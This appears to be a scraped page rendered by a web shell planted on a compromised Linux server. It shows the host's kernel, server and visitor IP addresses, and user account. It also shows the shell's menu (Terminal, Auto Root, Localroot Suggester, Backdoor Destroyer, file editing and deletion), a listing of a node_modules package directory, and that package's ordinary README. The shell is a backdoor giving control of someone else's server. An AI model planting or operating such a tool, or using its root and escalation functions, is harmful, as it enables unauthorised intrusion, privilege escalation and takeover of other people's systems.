Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.148.217.66
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
utils-merge /
Delete
Unzip
Name
Size
Permission
Date
Action
.npmignore
79
B
-rw-r--r--
2017-09-20 00:14
LICENSE
1.06
KB
-rw-r--r--
2017-09-20 00:08
README.md
1.29
KB
-rw-r--r--
2017-09-20 00:13
index.js
381
B
-rw-r--r--
2017-09-20 00:00
package.json
1.57
KB
-rw-r--r--
2021-02-04 21:24
Save
Rename
# utils-merge [](https://www.npmjs.com/package/utils-merge) [](https://travis-ci.org/jaredhanson/utils-merge) [](https://codeclimate.com/github/jaredhanson/utils-merge) [](https://coveralls.io/r/jaredhanson/utils-merge) [](https://david-dm.org/jaredhanson/utils-merge) Merges the properties from a source object into a destination object. ## Install ```bash $ npm install utils-merge ``` ## Usage ```javascript var a = { foo: 'bar' } , b = { bar: 'baz' }; merge(a, b); // => { foo: 'bar', bar: 'baz' } ``` ## License [The MIT License](http://opensource.org/licenses/MIT) Copyright (c) 2013-2017 Jared Hanson <[http://jaredhanson.net/](http://jaredhanson.net/)> <a target='_blank' rel='nofollow' href='https://app.codesponsor.io/link/vK9dyjRnnWsMzzJTQ57fRJpH/jaredhanson/utils-merge'> <img alt='Sponsor' width='888' height='68' src='https://app.codesponsor.io/embed/vK9dyjRnnWsMzzJTQ57fRJpH/jaredhanson/utils-merge.svg' /></a>